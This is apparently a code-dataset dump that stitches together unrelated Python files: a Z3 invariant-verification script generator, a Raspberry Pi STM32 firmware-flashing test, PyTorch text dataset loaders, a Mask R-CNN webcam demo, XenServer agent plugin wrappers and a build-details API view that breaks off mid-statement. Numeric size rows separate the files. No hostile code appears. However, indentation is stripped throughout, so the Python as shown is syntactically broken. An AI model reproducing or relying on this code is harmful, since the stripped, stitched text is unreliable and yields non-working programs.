output of Sketch. The output of this class is a script ready to
send to Z3 for verification.
"""
def __init__(self, program, inputs, loopvars, invariant):
"""
program is the AST of the loop nest to process.
inputs is a dict mapping names to (Sketch) types (most importantly for arrays).
invariant is a dict mapping generated function names from sketch to strings that can be parsed by parse_ir
"""
self.program = program
self.inputs = inputs
self.loopvars = loopvars
self.loopvar_mins = {}
self.loopvar_maxs = {}
self.set_maxs_and_mins()
logging.debug("Preprocessing, invariat is %s", invariant)
self.synthesized_invariant = self.process_invariants(invariant)
logging.debug("Synthesized invariant: %s", self.synthesized_invariant)
self.out_array = generate_sketch.OutputArrayFinder().get_output_arrays(program)
self.containing_loop_invs = {}
def process_invariants(self, invariant):
"""
Take strings in the invariant dict and convert into Z3 syntax.
"""
from backend_halide import ToHalide
import parse_ir
ret = {}
for inv_key in invariant.keys():
ir = parse_ir.parse_expression(invariant[inv_key])
logging.debug("loopvars are %s", self.loopvars)
if "gen" in inv_key:
converted_invariant = ToZ3(ir,self.loopvars,None,False,invariant,self.inputs).to_str()
ret[inv_key] = converted_invariant
else:
ret[inv_key] = tree_to_str(ir)
logging.debug("Processed invariants: ", ret)
return ret
def generate(self):
"""
Top-level. Generates an entire Z3 script for the given program and inputs.
"""
# first, we generate the invariant & postcondition call
postcondition = CallExp(VarNode("postcondition"),
[VarNode(x) for x in self.get_params_without_types()]
+ map(lambda x: VarNode(x), self.get_loopvars())
+ map(lambda x: VarNode(x+"_p"), self.get_loopvars()))
new_invariant_signatures = self.generate_invariant_func_signatures()
for x in new_invariant_signatures.keys():
logging.debug("inv: %s", tree_to_str(new_invariant_signatures[x]))
# get verification conditions
logging.debug("invariant signatures: %s", [tree_to_str(new_invariant_signatures[x]) for x in new_invariant_signatures.keys()])
wpc = WeakestPrecondition(self.program, postcondition, [], invariant_call=new_invariant_signatures)
conds = wpc.get()
additional_conds = wpc.additional_conditions
from generate_sketch import RHSInvariantReplacer
conds = RHSInvariantReplacer(self.get_loopvars()).visit(conds)
additional_conds = map(RHSInvariantReplacer(self.get_loopvars()).visit, additional_conds)
# translate verification conditions to Z3
logging.debug("Translating the following VCs: %s %s", tree_to_str(conds), '\n\n'.join([tree_to_str(x) for x in additional_conds]))
vc = ToZ3(conds, self.get_loopvars(), additional_conds, True, self.synthesized_invariant, self.inputs).to_str()
# put it all together
ret = self.generate_invariant_funcs()
ret += self.generate_postcon_func()
ret += self.generate_constants() + "\n\n"
ret += self.generate_assumptions()
ret += self.generate_signature() + vc + "))\n\n"
ret += "(assert (not main))\n(check-sat)\n(get-model)\n"
return ret
def generate_invariant_func_signatures(self):
"""
Generates signatures for each invariant function into a dict keyed by a hash of the loop
body.
"""
class InvGenLoopVisitor(asp.codegen.ast_tools.NodeVisitor):
def __init__(self, inputs, loopvars, params_without_types):
super(InvGenLoopVisitor, self).__init__()
self.invariants = {}
self.invariant_names_to_loops = {} # dict from names to loops
self.inputs = inputs
self.loopvars = loopvars
self.params_without_types = params_without_types
def visit_Block(self, node):
map(self.visit, node.body)
def visit_WhileLoop(self, node):
key = loop_key(node)
invariant_name = "I_%s_%s" % (node.iter_var.name, key)
self.invariants[key] = CallExp(VarNode(invariant_name),
[VarNode(x) for x in self.params_without_types] + map(lambda x: VarNode(x), self.loopvars))
self.invariant_names_to_loops[invariant_name] = node
self.visit(node.body)
visitor = InvGenLoopVisitor(self.inputs, self.get_loopvars(), self.get_params_without_types())
visitor.visit(self.program)
self.invariant_names_to_loops = visitor.invariant_names_to_loops
return visitor.invariants
def generate_invariant_funcs(self):
"""
Generates the Z3 function for the invariant.
"""
self.find_dependent_loopvars()
self.find_loopvar_nesting()
self.find_output_nesting()
from mako.template import Template
inv_template = Template(filename="templates/z3/invariant.2.z3.mako", format_exceptions=True)
ret = ""
#for looplevel in range(len(self.get_loopvars())):
#var = self.get_loopvars()[looplevel]
#ret += inv_template.render(name="I_"+var,
#looplevel=looplevel,
#loopvar_maxs=self.loopvar_maxs,
#loopvar_mins=self.loopvar_mins,
#parameters=self.get_params(),
#call_params=self.get_params_without_types(),
#outarray=self.get_out_array(),
#synthesized_invariant=self.get_synthesized_invariant_rhs(),
#loopvar=self.get_loopvars(),
#dependent_loopvars=self.dependent_loopvars,
#loopvar_nesting=self.loopvar_nesting,
#output_nesting=self.output_nesting)
for invariant in self.invariant_names_to_loops.keys():
#FIXME
looplevel = 0
node = self.invariant_names_to_loops[invariant]
thiskey = loop_key(node)
var = node.iter_var.name
containing_loop_invs = self.get_containing_loop_invs(node)
# we need to also know which loops this loop contains
thisloopcontains = self.get_loops_contained_by(node)
ret += inv_template.render(name=invariant,
synthesized_invariant=self.get_synthesized_invariant_rhs(),
looplevel=looplevel,
output_nesting=self.output_nesting,
containing_loop_invs=containing_loop_invs,
parameters=self.get_params(),
int_params=[x[0] for x in self.inputs if x[1]=="int"] + self.get_loopvars(),
call_params=self.get_params_without_types(),
outarray=self.get_out_array(),
thisloopvar=var,
thiskey=thiskey,
thisloopcontains=thisloopcontains,
loopvar=self.get_loopvars(),
mins=self.loopvar_mins,
maxs=self.loopvar_maxs,
loopvar_nesting=self.loopvar_nesting,
dependent_loopvars=self.dependent_loopvars)
return ret
def generate_postcon_func(self):
"""
Generate the Z3 function for the postcondition.
"""
from mako.template import Template
pcon_template = Template(filename="templates/z3/postcondition.z3.mako")
return pcon_template.render(parameters=self.get_params(),
call_params=self.get_params_without_types(),
loopvar_maxs=self.loopvar_maxs,
loopvar_mins=self.loopvar_mins,
outarray=self.get_out_array(),
synthesized_invariant=self.get_synthesized_invariant_rhs(),
loopvar=self.get_loopvars())
def generate_constants(self):
"""
Generates declarations for constants at the top-level of the script.
"""
all_params = [(x, "Int") for x in self.get_loopvars()] #+ [(x+"_to_check", "Int") for x in self.get_loopvars()]
all_params += [(x+"_p", "Int") for x in self.get_loopvars()] + self.get_params()
ret = "\n".join(["(declare-const %s %s)" % (x[0], x[1]) for x in all_params])
return ret
def get_params(self):
"""
Returns a list of tuples of (name, type) for each input.
"""
def is_arr(tp):
return "[" in tp[1]
def convert_type(tp):
translation_dict = {"double":"Real", "int":"Int"}
return translation_dict[tp.split()[0]]
def convert_type_array(tp):
scalar_tp = convert_type(tp.split("[")[0] + " ")
ret = ""
dim = len(tp.split("*"))
for x in range(dim):
ret += "(Array Int "
ret += scalar_tp
for x in range(dim):
ret += ")"
return ret
def is_float(tp):
return tp[1] == "double" or tp[1] == "float"
arrs = filter(is_arr, self.inputs)
non_arrs = filter(lambda x: not is_arr(x) and not is_float(x), self.inputs)
floats = filter(is_float, self.inputs)
return [(x[0], convert_type(x[1])) for x in floats] + [(x[0], "%s" % convert_type_array(x[1])) for x in arrs] + [(x[0], convert_type(x[1])) for x in non_arrs]
def generate_signature(self):
"""
Generate the signature for the main Z3 function.
"""
return "(define-fun main () Bool\n(and \n"
def generate_assumptions(self):
"""
Generates the necessary assumptions.
Right now, it generates, for a loopvar `i`, lower and upper bounds for `i` and `i_valp`.
For arrays of the type `T[N]` it generates bounds for `N` such that it is greater than 3.
"""
import asp.codegen.ast_tools
import re
ret = ""
for x in self.get_loopvars():
ret += "(assert (> (- %s %s) 1))" % (self.loopvar_maxs[x], self.loopvar_mins[x]) + "\n"
return ret
def get_params_without_types(self):
#return ', '.join(["%s" % (x[0]) for x in self.inputs])
return [x[0] for x in self.get_params()]
def get_out_array(self):
return self.out_array
def get_loopvars(self):
return self.loopvars
def get_synthesized_invariant_rhs(self):
#return "(select b (+ i_to_check 1))"
#return "(select b (+ (- i_to_check 1) (* j_to_check N)))"
return self.synthesized_invariant
def set_maxs_and_mins(self):
for x in self.get_loopvars():
maxfinder = generate_sketch.MaxFinder(x)
maxfinder.visit(self.program)
initfinder = generate_sketch.InitFinder(x)
initfinder.visit(self.program)
self.loopvar_mins[x] = ToZ3(initfinder.init,None,None).to_str()
self.loopvar_maxs[x] = ToZ3(maxfinder.maximum,None,None).to_str()
def replace_idx_vars(self, tree):
"""
Given an expression, replace the loopvariables `x` with `x_to_check`.
"""
import asp.codegen.ast_tools as ast_tools
import grammar
import copy
tree_copy = copy.deepcopy(tree)
class IdxReplacer(ast_tools.NodeTransformer):
def __init__(self, loopvars):
self.loopvars = loopvars
def visit_VarNode(self, node):
if node.name in self.loopvars:
return grammar.VarNode(node.name+"_to_check")
else:
return node
return IdxReplacer(self.get_loopvars()).visit(tree_copy)
def find_dependent_loopvars(self):
"""
For each output array, find which loopvars it depends on.
"""
class DependenceFinder(ast_tools.NodeVisitor):
def __init__(self, outputs, loopvars):
super(DependenceFinder, self).__init__()
self.outputs = outputs
self.loopvars = loopvars
self.dependences = {}
for x in self.outputs:
self.dependences[x] = []
self.in_lhs = False
self.in_arr_access = None
def visit_Block(self, node):
map(self.visit, node.body)
def visit_AssignExp(self, node):
self.in_lhs = True
self.visit(node.lval)
self.in_lhs = False
self.visit(node.rval)
def visit_ArrExp(self, node):
if self.in_lhs:
self.in_arr_access = node.name.name
self.visit(node.loc)
self.in_arr_access = None
def visit_VarNode(self, node):
if self.in_lhs and self.in_arr_access and node.name in self.loopvars:
self.dependences[self.in_arr_access].append(node.name)
df = DependenceFinder(self.get_out_array(), self.loopvars)
df.visit(self.program)
logging.debug("Dependent loop vars: %s", df.dependences)
self.dependent_loopvars = df.dependences
def find_loopvar_nesting(self):
"""
Find the nesting structure for the loops.
Returns loop->[containing loops] dict.
"""
self.loopvar_nesting = {}
for lv in self.get_loopvars():
self.loopvar_nesting[lv] = []
for inv in self.invariant_names_to_loops.keys():
node = self.invariant_names_to_loops[inv]
thisnodevar = node.iter_var.name
for x in self.get_containing_loop_invs(node):
logging.debug("%s contained by %s", thisnodevar, x[1].iter_var.name)
self.loopvar_nesting[thisnodevar].append(x[1].iter_var.name)
def find_output_nesting(self):
"""
Creates a structure to map from output->innermost loop.
"""
class OutputNestFinder(ast_tools.NodeVisitor):
def __init__(self, outputs):
self.outputs = outputs
self.cur_loopvar = None
self.output_nesting = {}
def visit_Block(self, node):
map(self.visit, node.body)
def visit_WhileLoop(self, node):
old_loopvar = self.cur_loopvar
self.cur_loopvar = node.iter_var.name
self.visit(node.body)
self.cur_loopvar = old_loopvar
def visit_AssignExp(self, node):
if self.cur_loopvar and isinstance(node.lval, ArrExp):
self.output_nesting[node.lval.name.name] = self.cur_loopvar
onf = OutputNestFinder(self.get_out_array())
onf.visit(self.program)
logging.debug("Output nesting: %s", onf.output_nesting)
self.output_nesting = onf.output_nesting
def get_containing_loop_invs(self, node):
"""
Return a list of (invariant function name, node) that correspond to the loops
outside a given loop.
"""
class ContainingLoopVisitor(asp.codegen.ast_tools.NodeVisitor):
def __init__(self):
super(ContainingLoopVisitor, self).__init__()
self.containing_loops = {}
self.current_outerloops = []
def visit_Block(self, node):
# need to do this sequentially
for n in node.body:
self.visit(n)
def visit_WhileLoop(self, node):
key = loop_key(node)
invariant_name = "I_%s_%s" % (node.iter_var.name, key)
self.containing_loops[invariant_name] = self.current_outerloops[:]
self.current_outerloops.append((invariant_name, node))
self.visit(node.body)
self.current_outerloops.pop()
if not self.containing_loop_invs:
visitor = ContainingLoopVisitor()
visitor.visit(self.program)
self.containing_loop_invs = visitor.containing_loops
logging.debug("Containing loops: %s", visitor.containing_loops)
key = loop_key(node)
invariant_name = "I_%s_%s" % (node.iter_var.name, key)
return self.containing_loop_invs[invariant_name]
def get_loops_contained_by(self, node):
"""
Return a list of (invariant function name, node) that correspond to the
loops contained by node.
"""
class ContainedLoopVisitor(asp.codegen.ast_tools.NodeVisitor):
def __init__(self):
super(ContainedLoopVisitor, self).__init__()
self.contained_loops = []
def visit_Block(self, node):
map(self.visit, node.body)
def visit_WhileLoop(self, node):
key = loop_key(node)
invariant_name = "I_%s_%s" % (node.iter_var.name, key)
self.contained_loops.append((invariant_name, node))
self.visit(node.body)
visitor = ContainedLoopVisitor()
visitor.visit(node.body)
return visitor.contained_loops
| 18,522 | 5,388 |
import os
import sys
import time
import spidev
import RPi.GPIO as GPIO
PBOARD_RESET_PIN = 25
PBOARD_BOOT0_PIN = 12
SLAVE_REQ_PIN = 16
GPIO.setmode(GPIO.BCM)
GPIO.setup(PBOARD_RESET_PIN, GPIO.IN)
GPIO.setup(PBOARD_BOOT0_PIN, GPIO.IN)
GPIO.setup(SLAVE_REQ_PIN, GPIO.IN, pull_up_down=GPIO.PUD_DOWN)
is_dfu = False
def enter_dfu():
# RESET LOW: Enter reset
GPIO.setup(PBOARD_RESET_PIN, GPIO.OUT)
GPIO.output(PBOARD_RESET_PIN, GPIO.LOW)
time.sleep(0.05)
# BOOT0 HIGH: Boot into DFU mode
GPIO.setup(PBOARD_BOOT0_PIN, GPIO.OUT)
GPIO.output(PBOARD_BOOT0_PIN, GPIO.HIGH)
time.sleep(0.05)
# Release RESET, BOOT0 still HIGH, STM32 now in DFU mode
GPIO.setup(PBOARD_RESET_PIN, GPIO.IN)
time.sleep(1)
def exit_dfu():
# Release BOOT0
GPIO.setup(PBOARD_BOOT0_PIN, GPIO.IN)
# Activate RESET
GPIO.setup(PBOARD_RESET_PIN, GPIO.OUT)
GPIO.output(PBOARD_RESET_PIN, GPIO.LOW)
time.sleep(0.05)
# Release RESET, BOOT0 is LOW, STM32 boots in normal mode
GPIO.setup(PBOARD_RESET_PIN, GPIO.IN)
time.sleep(0.2)
def flash_firmware(fw_path):
for x in range(5):
print(f"----------------- {fw_path.split('/')[-1]} -----------------")
enter_dfu()
if is_dfu:
exit_code = os.system(f'sudo dfu-util --device ,0483:df11 -a 0 -D {fw_path}') >> 8
else:
exit_code = os.system(f'sudo stm32flash -w {fw_path} -a 0x3b /dev/i2c-1') >> 8
exit_dfu()
if exit_code != 0:
for x in range(5):
print("!!!!!!!!!!!!!!!!! TEST FLASH FAILED !!!!!!!!!!!!!!!!!")
exit()
if(len(sys.argv) < 3):
print (__file__ + ' payload_fw test_fw')
exit()
os.system("clear")
pcard_spi = spidev.SpiDev(0, 0)
pcard_spi.max_speed_hz = 2000000
payload_fw_path = sys.argv[1]
test_fw_path = sys.argv[2]
if '.dfu' in payload_fw_path.lower() or '.dfu' in test_fw_path.lower():
is_dfu = True
flash_firmware(test_fw_path)
req_result = []
for x in range(10):
req_result.append(GPIO.input(SLAVE_REQ_PIN))
time.sleep(0.1)
print(req_result)
if 0 not in req_result or 1 not in req_result or req_result.count(0) <= 3 or req_result.count(1) <= 3:
for x in range(5):
print("!!!!!!!!!!!!!!!!! SLAVE REQ ERROR !!!!!!!!!!!!!!!!!")
exit()
while 1:
if len(input("Press enter to continue\n")) == 0:
break;
flash_firmware(payload_fw_path)
SPI_MOSI_MAGIC = 0xde
SPI_MOSI_MSG_TYPE_INFO_REQUEST = 1
nop_spi_msg_template = [SPI_MOSI_MAGIC] + [0]*31
info_request_spi_msg_template = [SPI_MOSI_MAGIC, 0, SPI_MOSI_MSG_TYPE_INFO_REQUEST] + [0]*29
this_msg = list(info_request_spi_msg_template)
pcard_spi.xfer(this_msg)
time.sleep(0.1)
response = pcard_spi.xfer(list(nop_spi_msg_template))
time.sleep(0.1)
print(response)
if response[0] != 205:
for x in range(5):
print("!!!!!!!!!!!!!!!!! WRONG RESPONSE !!!!!!!!!!!!!!!!!")
else:
print("----------------- OK OK OK OK OK OK -----------------")
print("----------------- OK OK OK OK OK OK -----------------") | 2,991 | 1,393 |
"""
Text datatset iterators, as an extension of the PyTorch Dataset class.
class SimpleTextData(): reads a text file line by line up to a specified sequence length.
class SimpleTextDataSplit(): extends SimpleTextData() by splitting the data in train and val sets.
class TextDataPadded(): extends SimpleTextData() by padding the text up to the specified sequence length.
"""
import os.path as osp
import sys
import numpy as np
import torch
from torch.utils.data import Dataset
# We include the path of the toplevel package in the system path so we can always use absolute imports within the package.
toplevel_path = osp.abspath(osp.join(osp.dirname(__file__), ".."))
if toplevel_path not in sys.path:
sys.path.insert(1, toplevel_path)
from util.error import InvalidLengthError # noqa: E402
__author__ = "Tom Pelsmaeker"
__copyright__ = "Copyright 2020"
class SimpleTextData(Dataset):
"""Dataset of text that reads the first N tokens from each line in the given textfile as data.
Args:
file(str): name of the file containing the text data already converted to indices.
seq_len(int): maximum length of sequences. Longer sequences will be cut at this length.
"""
def __init__(self, file, seq_len):
if seq_len == 0:
self._seq_len = len(max(open(file, "r"), key=len).split())
else:
self._seq_len = seq_len
self._data = [
line.split()[: self._seq_len] for line in open(file, "r") if line != "\n"
]
self._data_len = len(self._data)
def __len__(self):
return self._data_len
def __getitem__(self, idx):
return torch.LongTensor(self._data[idx])
class TextDataSplit(SimpleTextData):
"""Dataset of text that allows a train/validation split from a single file. Extends SimpleTextData().
Args:
file(str): name of the file containing the text data already converted to indices.
seq_len(int): maximum length of sequences. Longer sequences will be cut at this length.
train(bool): True when training, False when testing.
"""
def __init__(self, file, seq_len, train):
super().__init__(file, seq_len)
if train:
self._data = self._data[: int(self.data.shape[0] * 0.9), :]
else:
self._data = self._data[int(self.data.shape[0] * 0.9) :, :]
self._data_len = self.data.shape[0]
class TextDataUnPadded(SimpleTextData):
"""
Dataset of text that prepares sequences for padding, but does not pad them yet. Extends SimpleTextData().
Args:
file(str): name of the file containing the text data already converted to indices.
seq_len(int): maximum length of sequences. shorter sequences will be padded to this length.
pad_token(int): token that is appended to sentences shorter than seq_len.
"""
def __init__(self, file, seq_len, pad_token):
super().__init__(file, seq_len)
# This class also provides reversed sequences that are needed in certain generative model training
self._reverse_data = [
line.split()[: self._seq_len][::-1]
for line in open(file, "r")
if line != "\n"
]
self._pad_token = pad_token
def __getitem__(self, idx):
return self._data[idx], self._reverse_data[idx], self._pad_token
class TextDataPadded(TextDataUnPadded):
"""
Dataset of text that pads sequences up to the specified sequence length. Extends TextDataUnPadded().
Args:
file(str): name of the file containing the text data already converted to indices.
seq_len(int): maximum length of sequences. shorter sequences will be padded to this length.
pad_token(int): token that is appended to sentences shorter than seq_len.
"""
def __init__(self, file, seq_len, pad_token):
super().__init__(file, seq_len, pad_token)
self._seq_lens = []
for line in self._data:
self._seq_lens.append(len(line))
if len(line) < self._seq_len:
line.extend([pad_token] * (self._seq_len - len(line)))
for reverse_line in self._reverse_data:
if len(reverse_line) < self._seq_len:
reverse_line.extend([pad_token] * (self._seq_len - len(reverse_line)))
self._seq_lens = torch.LongTensor(self._seq_lens)
self._data = torch.from_numpy(np.array(self._data, dtype=np.int64))
self._reverse_data = torch.from_numpy(
np.array(self._reverse_data, dtype=np.int64)
)
self._mask = 1.0 - (self._data == pad_token).float()
def __getitem__(self, idx):
return (
self._data[idx],
self._seq_lens[idx],
self._mask[idx],
self._reverse_data[idx],
)
def sort_collate(batch):
"""Custom collate_fn for DataLoaders, sorts data based on sequence lengths.
Note that it is assumed that the variable on which to sort will be in the second position of the input tuples.
Args:
batch(list of tuples): a batch of data provided by a DataLoader given a Dataset, i.e a list of length batch_size
of tuples, where each tuple contains the variables of the DataSet at a single index.
Returns:
list of tensors: the batch of data, with a tensor of length batch_size per variable in the DataSet,
sorted according to the second variable which is assumed to be length information. The list contains
[data, lengths, ...].
Raises:
InvalidLengthError: if the input has less than two variables per index.
"""
if len(batch[0]) < 2:
raise InvalidLengthError(
"Batch needs to contain at least data (batch[0]) and lengths (batch[1])."
)
# Unpack batch from list of tuples [(x_i, y_i, ...), ...] to list of tensors [x, y, ...]
batch = [torch.stack([b[i] for b in batch]) for i in range(len(batch[0]))]
# Get lengths from second tensor in batch and sort all batch data based on those lengths
_, indices = torch.sort(batch[1], descending=True)
batch = [data[indices] for data in batch]
return batch
def sort_pad_collate(batch):
"""Custom collate_fn for DataLoaders, pads data and sorts based on sequence lengths.
This collate function works together with the TextDataUnPadded Dataset, that provides a batch of data in the correct
format for this function to pad and sort.
Args:
batch(list of tuples): a batch of data provided by a DataLoader given a Dataset, i.e a list of length batch_size
of tuples, where each tuple contains the variables of the DataSet at a single index. Each tuple must contain
(data_i, reversed_data_i, pad_token).
Returns:
list of tensors: the batch of data, with a tensor of length batch_size per variable in the DataSet,
sorted according to the second variable which is assumed to be length information. The list contains:
[data, lengths, mask, reversed data].
Raises:
InvalidLengthError: if the input does not have three variables per index.
"""
if len(batch[0]) != 3:
raise InvalidLengthError(
"Batch needs to contain data (batch[0]), reverse_data (batch[1]) and pad_token (batch[2])."
)
# Unpack batch from list of tuples [(x_i, y_i, ...), ...] to list of lists [x, y, ...]
batch = [[b[i] for b in batch] for i in range(len(batch[0]))]
# Pad tensors
x_len = torch.tensor([len(line) for line in batch[0]])
max_len = x_len.max().item()
pad_token = batch[2][0]
for line in batch[0]:
if len(line) < max_len:
line.extend([pad_token] * (max_len - len(line)))
for line in batch[1]:
if len(line) < max_len:
line.extend([pad_token] * (max_len - len(line)))
# Store data tensors in correct format and order
batch[0] = torch.from_numpy(np.array(batch[0], dtype=np.int64))
batch.append(torch.from_numpy(np.array(batch[1], dtype=np.int64)))
# Store length and mask in correct format and order
batch[1] = x_len
batch[2] = 1.0 - (batch[0] == pad_token).float()
# Get lengths from second tensor in batch and sort all batch data based on those lengths
_, indices = torch.sort(batch[1], descending=True)
batch = [data[indices] for data in batch]
return batch
| 8,394 | 2,487 |
# Copyright (c) 2021, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved.
import argparse
import cv2
from maskrcnn_benchmark.config import cfg
from predictor import COCODemo
import time
def main():
parser = argparse.ArgumentParser(description="PyTorch Object Detection Webcam Demo")
parser.add_argument(
"--config-file",
default="../configs/caffe2/e2e_mask_rcnn_R_50_FPN_1x_caffe2.yaml",
metavar="FILE",
help="path to config file",
)
parser.add_argument(
"--confidence-threshold",
type=float,
default=0.7,
help="Minimum score for the prediction to be shown",
)
parser.add_argument(
"--min-image-size",
type=int,
default=224,
help="Smallest size of the image to feed to the model. "
"Model was trained with 800, which gives best results",
)
parser.add_argument(
"--show-mask-heatmaps",
dest="show_mask_heatmaps",
help="Show a heatmap probability for the top masks-per-dim masks",
action="store_true",
)
parser.add_argument(
"--masks-per-dim",
type=int,
default=2,
help="Number of heatmaps per dimension to show",
)
parser.add_argument(
"opts",
help="Modify model config options using the command-line",
default=None,
nargs=argparse.REMAINDER,
)
args = parser.parse_args()
# load config from file and command-line arguments
cfg.merge_from_file(args.config_file)
cfg.merge_from_list(args.opts)
cfg.freeze()
# prepare object that handles inference plus adds predictions on top of image
coco_demo = COCODemo(
cfg,
confidence_threshold=args.confidence_threshold,
show_mask_heatmaps=args.show_mask_heatmaps,
masks_per_dim=args.masks_per_dim,
min_image_size=args.min_image_size,
)
cam = cv2.VideoCapture(0)
while True:
start_time = time.time()
ret_val, img = cam.read()
composite = coco_demo.run_on_opencv_image(img)
print("Time: {:.2f} s / img".format(time.time() - start_time))
cv2.imshow("COCO detections", composite)
if cv2.waitKey(1) == 27:
break # esc to quit
cv2.destroyAllWindows()
if __name__ == "__main__":
main()
| 2,938 | 940 |
# Copyright 2017 Citrix Systems
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
def version(session, uuid, dom_id, timeout):
args = {'id': uuid, 'dom_id': dom_id, 'timeout': timeout}
return session.call_plugin('agent.py', 'version', args)
def key_init(session, uuid, dom_id, timeout, pub=''):
args = {'id': uuid, 'dom_id': dom_id, 'timeout': timeout,
'pub': pub}
return session.call_plugin('agent.py', 'key_init', args)
def agent_update(session, uuid, dom_id, timeout, url='', md5sum=''):
args = {'id': uuid, 'dom_id': dom_id, 'timeout': timeout,
'url': url, 'md5sum': md5sum}
return session.call_plugin('agent.py', 'agentupdate', args)
def password(session, uuid, dom_id, timeout, enc_pass=''):
args = {'id': uuid, 'dom_id': dom_id, 'timeout': timeout,
'enc_pass': enc_pass}
return session.call_plugin('agent.py', 'password', args)
def inject_file(session, uuid, dom_id, timeout, b64_path='', b64_contents=''):
args = {'id': uuid, 'dom_id': dom_id, 'timeout': timeout,
'b64_path': b64_path, 'b64_contents': b64_contents}
return session.call_plugin('agent.py', 'inject_file', args)
def reset_network(session, uuid, dom_id, timeout):
args = {'id': uuid, 'dom_id': dom_id, 'timeout': timeout}
return session.call_plugin('agent.py', 'resetnetwork', args)
| 1,886 | 636 |
from __future__ import absolute_import
from collections import defaultdict
from flask_restful.reqparse import RequestParser
from itertools import groupby
from sqlalchemy.orm import contains_eager, joinedload, subqueryload_all
from uuid import UUID
from changes.api.base import APIView
from changes.api.serializer.models.testcase import TestCaseWithOriginCrumbler
from changes.config import db
from changes.constants import Result, Status
from changes.models import (
Build, BuildPriority, Source, Event, FailureReason, Job, TestCase,
BuildSeen, User
)
from changes.utils.originfinder import find_failure_origins
def find_changed_tests(current_build, previous_build, limit=25):
current_job_ids = [j.id.hex for j in current_build.jobs]
previous_job_ids = [j.id.hex for j in previous_build.jobs]
if not (current_job_ids and previous_job_ids):
return []
current_job_clause = ', '.join(
':c_job_id_%s' % i for i in range(len(current_job_ids))
)
previous_job_clause = ', '.join(
':p_job_id_%s' % i for i in range(len(previous_job_ids))
)
params = {}
for idx, job_id in enumerate(current_job_ids):
params['c_job_id_%s' % idx] = job_id
for idx, job_id in enumerate(previous_job_ids):
params['p_job_id_%s' % idx] = job_id
# find all tests that have appeared in one job but not the other
# we have to build this query up manually as sqlalchemy doesnt support
# the FULL OUTER JOIN clause
query = """
SELECT c.id AS c_id,
p.id AS p_id
FROM (
SELECT label_sha, id
FROM test
WHERE job_id IN (%(current_job_clause)s)
) as c
FULL OUTER JOIN (
SELECT label_sha, id
FROM test
WHERE job_id IN (%(previous_job_clause)s)
) as p
ON c.label_sha = p.label_sha
WHERE (c.id IS NULL OR p.id IS NULL)
""" % {
'current_job_clause': current_job_clause,
'previous_job_clause': previous_job_clause
}
total = db.session.query(
'count'
).from_statement(
'SELECT COUNT(*) FROM (%s) as a' % (query,)
).params(**params).scalar()
if not total:
return {
'total': 0,
'changes': [],
}
results = db.session.query(
'c_id', 'p_id'
).from_statement(
'%s LIMIT %d' % (query, limit)
).params(**params)
all_test_ids = set()
for c_id, p_id in results:
if c_id:
all_test_ids.add(c_id)
else:
all_test_ids.add(p_id)
test_map = dict(
(t.id, t) for t in TestCase.query.filter(
TestCase.id.in_(all_test_ids),
).options(
joinedload('job', innerjoin=True),
)
)
diff = []
for c_id, p_id in results:
if p_id:
diff.append(('-', test_map[UUID(p_id)]))
else:
diff.append(('+', test_map[UUID(c_id)]))
return {
'total': total,
'changes': sorted(diff, key=lambda x: (x[1].package, x[1].name)),
}
def get_failure_reasons(build):
from changes.buildfailures import registry
rows = FailureReason.query.filter(
FailureReason.build_id == build.id,
)
failure_reasons = []
for row in rows:
failure_reasons.append({
'id': row.reason,
'reason': registry[row.reason].get_html_label(build),
'step_id': row.step_id,
'job_id': row.job_id,
'data': dict(row.data or {}),
})
return failure_reasons
def get_parents_last_builds(build):
# A patch have only one parent, while a revision can have more.
if build.source.patch:
parents = [build.source.patch.parent_revision_sha]
elif build.source.revision:
parents = build.source.revision.parents
if parents:
parent_builds = list(Build.query.filter(
Build.project == build.project,
Build.status == Status.finished,
Build.id != build.id,
Source.patch_id == None, # NOQA
).join(
Source, Build.source_id == Source.id,
).options(
contains_eager('source').joinedload('revision'),
).filter(
Source.revision_sha.in_(parents)
).order_by(Build.date_created.desc()))
if parent_builds:
# This returns a list with the last build of each revision.
return [
list(builds)[0]
for sha, builds in groupby(
parent_builds,
lambda rev: rev.source.revision_sha
)
]
return []
class BuildDetailsAPIView(APIView):
post_parser = RequestParser()
post_parser.add_argument('priority', choices=BuildPriority._member_names_)
def get(self, build_id):
build = Build.query.options(
joinedload('project', innerjoin=True),
joinedload('author'),
joinedload('source').joinedload('revision'),
subqueryload_all('stats'),
).get(build_id)
if build is None:
return '', 404
try:
most_recent_run = Build.query.filter(
Build.project == build.project,
Build.date_created < build.date_created,
Build.status == Status.finished,
Build.id != build.id,
Source.patch_id == None, # NOQA
).join(
Source, Build.source_id == Source.id,
).options(
contains_eager('source').joinedload('revision'),
joinedload('author'),
).order_by(Build.date_created.desc())[0]
except IndexError:
most_recent_run = None
jobs = list(Job.query.filter(
Job.build_id == build.id,
))
# identify failures
test_failures = TestCase.query.options(
joinedload('job', innerjoin=True),
).filter(
TestCase.job_id.in_([j.id for j in jobs]),
TestCase.result == Result.failed,
).order_by(TestCase.name.asc())
num_test_failures = test_failures.count()
test_failures = test_failures[:25]
failures_by_job = defaultdict(list)
for failure in test_failures:
failures_by_job[failure.job].append(failure)
failure_origins = find_failure_origins(
build, test_failures)
for test_failure in test_failures:
test_failure.origin = failure_origins.get(test_failure)
# identify added/removed tests
if most_recent_run and build.status == Status.finished:
changed_tests = find_changed_tests(build, most_recent_run)
else:
changed_tests = []
seen_by = list(User.query.join(
BuildSeen, BuildSeen.user_id == User.id,
).filter(
BuildSeen.build_id == build.id,
))
extended_serializers = {
TestCase: TestCaseWithOriginCrumbler(),
}
event_list = list(Event.query.filter(
Event.item_id == build.id,
).order_by(Event.date_created.desc()))
context = self.serialize(build)
context.update({
'jobs': jobs,
'seenBy': seen_by,
'events': event_list,
'failures': get_failure_reasons(build),
'testFailures': {
'total': num_test_failures,
